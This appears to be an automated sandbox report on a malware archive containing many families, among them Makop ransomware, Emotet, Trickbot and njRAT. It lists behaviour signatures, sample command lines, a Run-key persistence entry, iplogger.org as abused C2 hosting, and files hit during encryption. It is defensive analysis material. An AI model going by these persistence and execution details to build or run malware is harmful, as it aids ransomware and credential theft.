Malware Analysis Report

2025-01-02 11:22

Sample ID 241204-x8wmhaxmcv
Target 241105-dtxrgatbpg_pw_infected.zip
SHA256 38bc13ef112b2f17d4d1a80243fac6a521b5d58228984aae0752d79487fa3b66
Tags
discovery makop credential_access defense_evasion execution impact persistence ransomware spyware stealer bazarbackdoor backdoor hawkeye_reborn m00nd3v_logger collection infostealer keylogger trojan phorphiex evasion loader upx worm zloader june08 june botnet njrat privilege_escalation trickbot banker rms xmrig aspackv2 lateral_movement miner rat emotet epoch3 qnodeservice betabot modiloader spx139 spx139 tar2 bot5 bot5 vidar 276 main 26.02.2020 xdsddd victime 25/03 samay cryptone packer 09/04 07/04 305419896 insert-coin yt system hacked hack revengerat cobaltstrike zeppelin xred djvu epoch1 masslogger rezer0 bot7 bot7
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

38bc13ef112b2f17d4d1a80243fac6a521b5d58228984aae0752d79487fa3b66

Threat Level: Known bad

The file 241105-dtxrgatbpg_pw_infected.zip was found to be: Known bad.

Malicious Activity Summary

discovery makop credential_access defense_evasion execution impact persistence ransomware spyware stealer bazarbackdoor backdoor hawkeye_reborn m00nd3v_logger collection infostealer keylogger trojan phorphiex evasion loader upx worm zloader june08 june botnet njrat privilege_escalation trickbot banker rms xmrig aspackv2 lateral_movement miner rat emotet epoch3 qnodeservice betabot modiloader spx139 spx139 tar2 bot5 bot5 vidar 276 main 26.02.2020 xdsddd victime 25/03 samay cryptone packer 09/04 07/04 305419896 insert-coin yt system hacked hack revengerat cobaltstrike zeppelin xred djvu epoch1 masslogger rezer0 bot7 bot7

Masslogger family

Djvu family

Revengerat family

Cobaltstrike family

Zloader family

Njrat family

Xmrig family

Xred family

xmrig

Makop family

Detects Zeppelin payload

Makop

M00nd3v_Logger

Hawkeye_reborn family

MassLogger

ModiLoader, DBatLoader

ModiLoader Second Stage

Detected Djvu ransomware

Trickbot

Windows security bypass

Vidar family

RMS

Vidar

QNodeService

Modiloader family

Trickbot family

Phorphiex, Phorpiex

Betabot family

Djvu Ransomware

Bazarbackdoor family

Emotet family

Rms family

Xred

Modifies Windows Defender Real-time Protection settings

MassLogger Main payload

HawkEye Reborn

Emotet

Modifies firewall policy service

BazarBackdoor

Modifies visiblity of hidden/system files in Explorer

BetaBot

M00nd3v_logger family

RevengeRat Executable

Zloader, Terdot, DELoader, ZeusSphinx

Qnodeservice family

njRAT/Bladabindi

Zeppelin family

Phorphiex family

XMRig Miner payload

Remote Service Session Hijacking: RDP Hijacking

Grants admin privileges

ModiLoader Second Stage

Emotet payload

Deletes shadow copies

Renames multiple (8081) files with added filename extension

M00nD3v Logger payload

Renames multiple (174) files with added filename extension

Vidar Stealer

CryptOne packer

ReZer0 packer

Event Triggered Execution: Image File Execution Options Injection

Drops file in Drivers directory

Stops running service(s)

Blocklisted process makes network request

Tries to connect to .bazar domain

Server Software Component: Terminal Services DLL

Modifies Windows Firewall

Blocks application from running via registry modification

Deletes backup catalog

Sets file to hidden

Reads local data of messenger clients

Loads dropped DLL

Uses the VBS compiler for execution

Windows security modification

Credentials from Password Stores: Windows Credential Manager

Modifies file permissions

Drops startup file

ACProtect 1.3x - 1.4x DLL software

Unexpected DNS network traffic destination

Checks computer location settings

ASPack v2.12-2.42

Executes dropped EXE

Checks BIOS information in registry

Reads user/profile data of local email clients

Reads user/profile data of web browsers

Password Policy Discovery

Legitimate hosting services abused for malware hosting/C2

Checks whether UAC is enabled

Adds Run key to start application

Checks installed software on the system

Accesses 2FA software files, possible credential harvesting

Modifies WinLogon

Enumerates connected drives

Indicator Removal: Clear Persistence

Accesses Microsoft Outlook profiles

Looks up external IP address via web service

UPX packed file

Hide Artifacts: Hidden Users

Suspicious use of SetThreadContext

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

System Location Discovery: System Language Discovery

Unsigned PE

Command and Scripting Interpreter: JavaScript

Browser Information Discovery

Program crash

Permission Groups Discovery: Local Groups

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

NSIS installer

Suspicious use of WriteProcessMemory

Interacts with shadow copies

Suspicious use of SetWindowsHookEx

Suspicious behavior: AddClipboardFormatListener

NTFS ADS

Enumerates system info in registry

Gathers network information

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Scheduled Task/Job: Scheduled Task

Delays execution with timeout.exe

Modifies Internet Explorer Protected Mode

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

outlook_win_path

Suspicious behavior: GetForegroundWindowSpam

Checks SCSI registry key(s)

outlook_office_path

Modifies registry class

Runs net.exe

Suspicious behavior: RenamesItself

Uses Task Scheduler COM API

Modifies Internet Explorer Protected Mode Banner

Runs .reg file with regedit

Suspicious behavior: MapViewOfSection

Uses Volume Shadow Copy WMI provider

Views/modifies file attributes

Kills process with taskkill

Checks processor information in registry

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-12-04 19:32

Signatures

Cobaltstrike family

cobaltstrike

Detects Zeppelin payload

Description Indicator Process Target
N/A N/A N/A N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Modiloader family

modiloader

Njrat family

njrat

RevengeRat Executable

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Revengerat family

revengerat

Xred family

xred

Zeppelin family

zeppelin

Zloader family

zloader

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

140s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\oof.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\oof.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\oof.exe

"C:\Users\Admin\AppData\Local\Temp\oof.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 180.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/1180-0-0x0000000002340000-0x0000000002341000-memory.dmp

memory/1180-2-0x0000000002340000-0x0000000002341000-memory.dmp

memory/1180-1-0x0000000000400000-0x00000000004AC000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

157s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\xNet.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\xNet.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 85.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 69.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe"

Signatures

Makop

ransomware makop

Makop family

makop

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (8081) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe\"" C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\ink\ja-JP\TipRes.dll.mui C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\PSS10R.CHM C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\Wide310x150Logo.scale-200.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.scale-150.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderWideTile.contrast-white_scale-100.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-black_targetsize-256.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-96_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\glib.md C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\19.jpg C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\next-arrow-hover.svg C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-100_contrast-white.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\LISTS\BASMLA.XSL C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-256_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-24_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.scale-100.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\TrackedSend.aapp C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Glossy.eftx C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.scale-150.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-32_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\selection-actions.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\ui-strings.js C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-il\ui-strings.js C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\share_icons.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_HK.properties C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchStoreLogo.scale-200_contrast-white.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-36_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-ae\ui-strings.js C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\offsymsl.ttf C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Voices\en-GB\en-GB_female_TTS\prompts_en-GB_TTS.lua C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MediumTile.scale-200_contrast-black.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\It.Tests.ps1 C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Spiral.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Dtmf_1_Loud.m4a C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_Grace-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\ui-strings.js C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\de-DE\wmlaunch.exe.mui C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\basicelegant.dotx C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_up_selected_18.svg C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\kk.pak.DATA C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\HeroAppTile.xml C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Spacer\2px.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\Flash.mpp C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\cloud_secured_lg.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\Windows Media Player\it-IT\wmlaunch.exe.mui C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-black\WideTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SONORA\THMBNAIL.PNG C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_2020.1906.55.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AlarmsLargeTile.contrast-white_scale-125.png C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\resources.pri C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Video_Msg_Record.m4a C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe N/A
